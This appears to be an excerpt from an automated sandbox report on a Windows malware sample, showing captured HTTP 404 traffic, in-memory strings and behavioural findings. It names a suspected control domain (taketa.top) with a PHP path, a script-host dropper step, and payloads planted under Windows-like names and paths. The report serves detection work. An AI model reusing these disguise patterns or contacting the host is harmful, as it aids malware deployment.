69 6c 74 6f 3a 25 35 62 6e 6f 25 32 30 61 64 64 72 65 73 73 25 32 30 67 69 76 65 6e 25 35 64 22 20 2f 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 2f 2a 2d 2d 3e 3c 21 5b 43 44 41 54 41 5b 2f 2a 3e 3c 21 2d 2d 2a 2f 20 0d 0a 20 20 20 20 62 6f 64 79 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0d 0a 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 43 43 3b 20 7d 0d 0a 20 20 20 20 70 2c 20 61 64 64 72 65 73 73 20 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 65 6d 3b 7d 0d 0a 20 20 20 20 73 70 61 6e 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 65 72 3b 7d 0d 0a 2f 2a 5d 5d 3e 2a 2f 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 68 31 3e 0d 0a 3c 70 3e 0d 0a 0d 0a 0d 0a 20 20 20 20 54 68 65 20 72 65 71 75 Data Ascii: 49f<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"><head><title>Object not found!</title><link rev="made" href="mailto:%5bno%20address%20given%5d" /><style type="text/css"><!--/--><![CDATA[/><!--*/ body { color: #000000; background-color:
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Apr 2024 03:18:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveVary: accept-language,accept-charsetAccept-Ranges: bytesContent-Language: enCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fEwT1LNQ7rK6CyWoJPdlksGShMyaVLsgzTAEX9OQMkJAw7vf7AB4xilTcfqMCRgNF%2Bg6ZkT1egWaTP2%2B32js5UVI1EXF7pwoaLlo2bQhNjJ51rQ2bGyiBBuJniYR"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 87a36caeba382245-MIAalt-svc: h2=":443"; ma=60Data Raw: 34 39 66 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 25 35 62 6e 6f 25 32 30 61 64 64 72 65 73 73 25 32 30 67 69 76 65 6e 25 35 64 22 20 2f 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 2f 2a 2d 2d 3e 3c 21 5b 43 44 41 54 41 5b 2f 2a 3e 3c 21 2d 2d 2a 2f 20 0d 0a 20 20 20 20 62 6f 64 79 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0d 0a 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 43 43 3b 20 7d 0d 0a 20 20 20 20 70 2c 20 61 64 64 72 65 73 73 20 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 65 6d 3b 7d 0d 0a 20 20 20 20 73 70 61 6e 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 65 72 3b 7d 0d 0a 2f 2a 5d 5d 3e 2a 2f 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 68 31 3e 0d 0a 3c 70 3e 0d 0a 0d 0a 0d 0a 20 20 20 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 Data Ascii: 49f<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"><head><title>Object not found!</title><link rev="made" href="mailto:%5bno%20address%20given%5d" /><style type="text/css"><!--/--><![CDATA[/><!--*/ body { color: #000000; backg
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Apr 2024 03:18:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveVary: accept-language,accept-charsetAccept-Ranges: bytesContent-Language: enCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aEZOpWwslAVQ5cnbvpM3LtG4NG509ZVdZFozrx1dX5wsnff3oRwjyXdEVLL2sNzrOEt6wJyFlZEpiw2dnbs4r2GOVfNquqTU43K0Q6NhRmFWfqaKh8uzeC3Queau"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 87a36cb9c9375c7f-MIAalt-svc: h2=":443"; ma=60Data Raw: 34 39 66 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 25 35 62 6e 6f 25 32 30 61 64 64 72 65 73 73 25 32 30 67 69 76 65 6e 25 35 64 22 20 2f 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 2f 2a 2d 2d 3e 3c 21 5b 43 44 41 54 41 5b 2f 2a 3e 3c 21 2d 2d 2a 2f 20 0d 0a 20 20 20 20 62 6f 64 79 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0d 0a 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 43 43 3b 20 7d 0d 0a 20 20 20 20 70 2c 20 61 64 64 72 65 73 73 20 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 65 6d 3b 7d 0d 0a 20 20 20 20 73 70 61 6e 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 65 72 3b 7d 0d 0a 2f 2a 5d 5d 3e 2a 2f 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 68 31 3e 0d 0a 3c 70 3e 0d 0a 0d 0a 0d 0a 20 20 20 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 Data Ascii: 49f<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"><head><title>Object not found!</title><link rev="made" href="mailto:%5bno%20address%20given%5d" /><style type="text/css"><!--/--><![CDATA[/><!--*/ body { color: #00000
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Apr 2024 03:18:23 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveVary: accept-language,accept-charsetAccept-Ranges: bytesContent-Language: enCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=62pg6uXYHVg9stmbUFpl3PdXJHdZDFv6iMHzjWAHQGYgOYIrvflXecCcF%2BgtuBkZ%2BIJwkIanMS0gKYHqgKsMOJVxzq9BSFJAmmBgcbZYbZMlHBtfPnKxuq2oCCnR"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 87a36cd82feb8d9d-MIAalt-svc: h2=":443"; ma=60Data Raw: 34 39 66 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 25 35 62 6e 6f 25 32 30 61 64 64 72 65 73 73 25 32 30 67 69 76 65 6e 25 35 64 22 20 2f 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 2f 2a 2d 2d 3e 3c 21 5b 43 44 41 54 41 5b 2f 2a 3e 3c 21 2d 2d 2a 2f 20 0d 0a 20 20 20 20 62 6f 64 79 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0d 0a 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 43 43 3b 20 7d 0d 0a 20 20 20 20 70 2c 20 61 64 64 72 65 73 73 20 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 65 6d 3b 7d 0d 0a 20 20 20 20 73 70 61 6e 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 65 72 3b 7d 0d 0a 2f 2a 5d 5d 3e 2a 2f 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 68 31 3e 0d 0a 3c 70 3e 0d 0a 0d 0a 0d 0a 20 20 20 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 Data Ascii: 49f<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"><head><title>Object not found!</title><link rev="made" href="mailto:%5bno%20address%20given%5d" /><style type="text/css"><!--/--><![CDATA[/><!--*/ body { color: #000000; backg
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Apr 2024 03:18:49 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveVary: accept-language,accept-charsetAccept-Ranges: bytesContent-Language: enCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TIGOFkDFozZloVjVSUhqmScus6gWZrgfNHJ7%2BF9II6zvco2VKDb1qejr%2BeimlBeU4KiDgM0C%2BE6VSMDqRbPclamE0kYte6OOmctN6bkajJ0N5KgsSat2vGrrdkTt"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 87a36d7f5af00362-MIAalt-svc: h3=":443"; ma=86400Data Raw: 34 39 66 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 25 35 62 6e 6f 25 32 30 61 64 64 72 65 73 73 25 32 30 67 69 76 65 6e 25 35 64 22 20 2f 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 2f 2a 2d 2d 3e 3c 21 5b 43 44 41 54 41 5b 2f 2a 3e 3c 21 2d 2d 2a 2f 20 0d 0a 20 20 20 20 62 6f 64 79 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0d 0a 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 43 43 3b 20 7d 0d 0a 20 20 20 20 70 2c 20 61 64 64 72 65 73 73 20 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 65 6d 3b 7d 0d 0a 20 20 20 20 73 70 61 6e 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 65 72 3b 7d 0d 0a 2f 2a 5d 5d 3e 2a 2f 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 68 31 3e 0d 0a 3c 70 3e 0d 0a 0d 0a 0d 0a 20 20 20 20 54 68 65 20 72 65 71 75 65 Data Ascii: 49f<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"><head><title>Object not found!</title><link rev="made" href="mailto:%5bno%20address%20given%5d" /><style type="text/css"><!--/--><![CDATA[/><!--*/ body { color: #000000; background-colo
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Apr 2024 03:18:59 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveVary: accept-language,accept-charsetAccept-Ranges: bytesContent-Language: enCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cFLRbuteLRdnhvDtxHvPmFdT2HlqL9bkhBbAxD8NIl7TCzVtmxSYxb97HQcpj9QtyEFWqTH7O%2FkYjPn3aA90PYT1XwkTQJkabEwuvrX6PbluBxeCfGZMvKt%2BNrDs"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 87a36dbb1d08a533-MIAalt-svc: h3=":443"; ma=86400Data Raw: 34 39 66 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 25 35 62 6e 6f 25 32 30 61 64 64 72 65 73 73 25 32 30 67 69 76 65 6e 25 35 64 22 20 2f 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 2f 2a 2d 2d 3e 3c 21 5b 43 44 41 54 41 5b 2f 2a 3e 3c 21 2d 2d 2a 2f 20 0d 0a 20 20 20 20 62 6f 64 79 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0d 0a 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 43 43 3b 20 7d 0d 0a 20 20 20 20 70 2c 20 61 64 64 72 65 73 73 20 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 65 6d 3b 7d 0d 0a 20 20 20 20 73 70 61 6e 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 65 72 3b 7d 0d 0a 2f 2a 5d 5d 3e 2a 2f 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 68 31 3e 0d 0a 3c 70 3e 0d 0a 0d 0a 0d 0a 20 20 20 20 54 68 65 20 72 65 71 75 65 73 74 Data Ascii: 49f<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"><head><title>Object not found!</title><link rev="made" href="mailto:%5bno%20address%20given%5d" /><style type="text/css"><!--/--><![CDATA[/><!--*/ body { color: #000000; background-

Source: MsintoRefcommonsvc.exe, 00000005.00000002.1885029457.00000000038EE000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 0000001F.00000002.1984917636.00000000036FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: conhost.exe, 0000001F.00000002.1984917636.00000000038D0000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 0000001F.00000002.1984917636.00000000036FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://taketa.top
Source: conhost.exe, 0000001F.00000002.1984917636.00000000036FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://taketa.top/
Source: conhost.exe, 0000001F.00000002.1984917636.00000000036FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://taketa.top/JavascriptPollMultigeneratordatalife.php

System Summary

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Source: C:\Users\user\Desktop\yX8787W7de.exe

Code function: 0_2_00126FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,

0_2_00126FAA

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: c:\Windows\System32\CSCE4B7E694399A43119EA8A93F1E7760F4.TMP			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: c:\Windows\System32\SecurityHealthSystray.exe			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

File deleted: C:\Windows\System32\CSCE4B7E694399A43119EA8A93F1E7760F4.TMP

Jump to behavior

Source: C:\Users\user\Desktop\yX8787W7de.exe	Code function: 0_2_0012848E	0_2_0012848E
Source: C:\Users\user\Desktop\yX8787W7de.exe	Code function: 0_2_00134088	0_2_00134088
Source: C:\Users\user\Desktop\yX8787W7de.exe	Code function: 0_2_001300B7	0_2_001300B7
Source: C:\Users\user\Desktop\yX8787W7de.exe	Code function: 0_2_001240FE	0_2_001240FE
Source: C:\Users\user\Desktop\yX8787W7de.exe	Code function: 0_2_00137153	0_2_00137153
Source: C:\Users\user\Desktop\yX8787W7de.exe	Code function: 0_2_001451C9	0_2_001451C9
Source: C:\Users\user\Desktop\yX8787W7de.exe	Code function: 0_2_001362CA	0_2_001362CA
Source: C:\Users\user\Desktop\yX8787W7de.exe	Code function: 0_2_001232F7	0_2_001232F7
Source: C:\Users\user\Desktop\yX8787W7de.exe	Code function: 0_2_001343BF	0_2_001343BF
Source: C:\Users\user\Desktop\yX8787W7de.exe	Code function: 0_2_0012C426	0_2_0012C426
Source: C:\Users\user\Desktop\yX8787W7de.exe	Code function: 0_2_0014D440	0_2_0014D440
Source: C:\Users\user\Desktop\yX8787W7de.exe	Code function: 0_2_0012F461	0_2_0012F461
Source: C:\Users\user\Desktop\yX8787W7de.exe	Code function: 0_2_001377EF	0_2_001377EF
Source: C:\Users\user\Desktop\yX8787W7de.exe	Code function: 0_2_0012286B	0_2_0012286B
Source: C:\Users\user\Desktop\yX8787W7de.exe	Code function: 0_2_0014D8EE	0_2_0014D8EE
Source: C:\Users\user\Desktop\yX8787W7de.exe	Code function: 0_2_0012E9B7	0_2_0012E9B7
Source: C:\Users\user\Desktop\yX8787W7de.exe	Code function: 0_2_001519F4	0_2_001519F4
Source: C:\Users\user\Desktop\yX8787W7de.exe	Code function: 0_2_00136CDC	0_2_00136CDC
Source: C:\Users\user\Desktop\yX8787W7de.exe	Code function: 0_2_00133E0B	0_2_00133E0B
Source: C:\Users\user\Desktop\yX8787W7de.exe	Code function: 0_2_00144F9A	0_2_00144F9A
Source: C:\Users\user\Desktop\yX8787W7de.exe	Code function: 0_2_0012EFE2	0_2_0012EFE2
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Code function: 5_2_00007FFD9BAA0D48	5_2_00007FFD9BAA0D48
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Code function: 5_2_00007FFD9BAA0E43	5_2_00007FFD9BAA0E43
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Code function: 5_2_00007FFD9BE4A701	5_2_00007FFD9BE4A701
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Code function: 5_2_00007FFD9BE49951	5_2_00007FFD9BE49951
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Code function: 31_2_00007FFD9BAD0D48	31_2_00007FFD9BAD0D48
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Code function: 31_2_00007FFD9BAD0E43	31_2_00007FFD9BAD0E43
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Code function: 31_2_00007FFD9BE74F69	31_2_00007FFD9BE74F69
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Code function: 32_2_00007FFD9BAC0D48	32_2_00007FFD9BAC0D48
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Code function: 32_2_00007FFD9BAC0E43	32_2_00007FFD9BAC0E43
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Code function: 33_2_00007FFD9BAD1865	33_2_00007FFD9BAD1865
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Code function: 33_2_00007FFD9BAB06AE	33_2_00007FFD9BAB06AE
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Code function: 33_2_00007FFD9BAB0456	33_2_00007FFD9BAB0456
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Code function: 33_2_00007FFD9BAB088F	33_2_00007FFD9BAB088F
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Code function: 33_2_00007FFD9BAA0D48	33_2_00007FFD9BAA0D48
